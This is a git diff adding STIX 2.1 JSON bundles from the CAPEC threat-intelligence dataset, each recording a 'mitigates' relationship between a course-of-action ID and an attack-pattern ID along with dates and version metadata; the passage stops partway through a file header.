diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json new file mode 100644 index 0000000000000000000000000000000000000000..2191ef91a4f7727611f21783d6349530e767694f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c00e8cc9-22f1-4cba-81e5-aead4834a2da", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--007dc896-33a1-418f-8400-a4ae48f79658", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "spec_version": "2.1", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json new file mode 100644 index 0000000000000000000000000000000000000000..158a13d8a85e3c48105ddea6d8cf84edcaea7e65 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--7aaa2182-2784-48e6-b731-82215def4c3c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "spec_version": "2.1", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json new file mode 100644 index 0000000000000000000000000000000000000000..f35c39f23c323c640c58f30dcd33dd299fceb691 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6097953f-3ca2-4eb4-9ea1-2cfdf403124b", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json new file mode 100644 index 0000000000000000000000000000000000000000..c0f9978f729a02388e633f8aaeaa6a20368ef789 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--fcc06222-1e3b-462c-a461-1251fe1f0be0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json new file mode 100644 index 0000000000000000000000000000000000000000..a85c726e32fe61eac1791f885d623507e0483966 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--cf938a2d-21e4-4d5f-b040-99796a866d68", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json new file mode 100644 index 0000000000000000000000000000000000000000..70a7396b08e29684735ed0778b0ac6f8de37161f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--97500443-bdf7-427d-a997-a9c2994dc2ff", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json new file mode 100644 index 0000000000000000000000000000000000000000..0bd0a23d17b78e90400b3e25c9415b43380ea2ef --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--2e753c52-8a51-460f-bf5e-82fe5b19cec5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0174af7d-b07c-4326-98d7-485d81f6876c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json new file mode 100644 index 0000000000000000000000000000000000000000..e69d206a994c6a43c3cee30525a052ea6a101034 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--100a329d-ba83-48b7-ac8d-0ea6a006ae33", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json new file mode 100644 index 0000000000000000000000000000000000000000..8a4a332e0ce7c6923a484c3ac78da1c78a5e2086 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--78723478-3982-46fc-9027-e48c31d70203", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "spec_version": "2.1", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json new file mode 100644 index 0000000000000000000000000000000000000000..40f9bd14027b158d7656617b8c4f8f423b93d6e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--2c257783-258d-47b1-97c1-566909d7d97c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json new file mode 100644 index 0000000000000000000000000000000000000000..5b92c5d09af10c541e9164a6666de995da081621 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02109430-cdab-456f-831f-cbf8dc34209a.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--bc3f067a-0d3e-41ff-acd1-f593183332f5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02109430-cdab-456f-831f-cbf8dc34209a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "spec_version": "2.1", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json new file mode 100644 index 0000000000000000000000000000000000000000..3089da4e024dd729a25befe4efe780f807195bb6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02819a54-8939-497c-b2eb-faaac80cabf0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--1538e0ff-7553-418d-9bb6-e72e8bec9430", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02819a54-8939-497c-b2eb-faaac80cabf0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "spec_version": "2.1", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json new file mode 100644 index 0000000000000000000000000000000000000000..f1eb784bf844e5d3a1c35ab61ec5a5146ec19adb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e7007394-fd72-4915-a33e-34fd8f184fba", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "spec_version": "2.1", + "target_ref": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a.json new file mode 100644 index 0000000000000000000000000000000000000000..e29e11adfd99f0bba96f612436cb4302361b55cc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--c743a406-3ceb-470b-869b-201fc6da576a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json new file mode 100644 index 0000000000000000000000000000000000000000..bca9ec53dbb9dd42403840a3706c3e803e61e5ed --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b07042cd-1d26-4a72-a7eb-60e5ccd7d47f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03a4f7c0-05b3-44e7-b7fa-5e51c7216743", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ed0f42c-e94a-4d92-be95-06df4d69c7b7", + "spec_version": "2.1", + "target_ref": "attack-pattern--36a2f844-0c20-41d7-9a10-66f1e4c43db8", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json new file mode 100644 index 0000000000000000000000000000000000000000..eced1b172341c8900256627f583db5d67a41ceb8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03ca0e49-f51b-444a-bfae-ac04853513a4.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9799f1a3-a7f8-4ef6-a910-059a197573cf", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03ca0e49-f51b-444a-bfae-ac04853513a4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json new file mode 100644 index 0000000000000000000000000000000000000000..3a4a7153bb3cbedf1abf835855c476a3d6c7a0ef --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--03fec1aa-4921-455b-89f5-01af59405338.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--7d76ba1b-1632-49b3-860d-d55fd332bb7a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03fec1aa-4921-455b-89f5-01af59405338", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04107b1a-930b-4176-95d0-e7209880a9b9.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04107b1a-930b-4176-95d0-e7209880a9b9.json new file mode 100644 index 0000000000000000000000000000000000000000..57d2331946b478af2d482421b4741892745e4342 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04107b1a-930b-4176-95d0-e7209880a9b9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--cebde274-77fd-4b89-8f61-5f1b4d4de532", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04107b1a-930b-4176-95d0-e7209880a9b9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49f16706-cef6-476c-902e-ca7d425a38d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json new file mode 100644 index 0000000000000000000000000000000000000000..21aec0577936298ca0253cfc209d08948da74b28 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04308827-581a-464a-8378-efed9a9a7476.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ae81c3c5-2fcb-4ea2-9b8f-40180c07cf6e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04308827-581a-464a-8378-efed9a9a7476", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "spec_version": "2.1", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json new file mode 100644 index 0000000000000000000000000000000000000000..ab10970bfce6278f01c3c7ac527a0503f1bd3d98 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04696e3f-623a-46fd-bd0e-c253d001cba3.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--5e76b80a-f00b-4156-acb4-73523ec3307b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04696e3f-623a-46fd-bd0e-c253d001cba3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "spec_version": "2.1", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json new file mode 100644 index 0000000000000000000000000000000000000000..7bc1a90473553d88958f89194e171a9482e235d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--39d33168-8edf-4697-8417-6ca5e0968fe7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json new file mode 100644 index 0000000000000000000000000000000000000000..c97d2eceac72acbc32196592e639be58669a5bef --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04915a3b-b205-4fc6-8701-3035bdceff35.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9ee338e2-2cb0-4640-90e8-a150cfe7fc5d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04915a3b-b205-4fc6-8701-3035bdceff35", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "spec_version": "2.1", + "target_ref": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04be062d-d511-410f-99c9-f9f7993a39af.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04be062d-d511-410f-99c9-f9f7993a39af.json new file mode 100644 index 0000000000000000000000000000000000000000..40050067d93c9c72dc38f64b4c2130c8208de149 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04be062d-d511-410f-99c9-f9f7993a39af.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--40c5a7e3-f565-4db4-bf9a-26bfac2e9453", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04be062d-d511-410f-99c9-f9f7993a39af", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf6e6d14-40c1-4f5f-9acd-1ad186a51940", + "spec_version": "2.1", + "target_ref": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json new file mode 100644 index 0000000000000000000000000000000000000000..4f81a17a8cf780c5220f3949e8af6695490289db --- /dev/null +++ 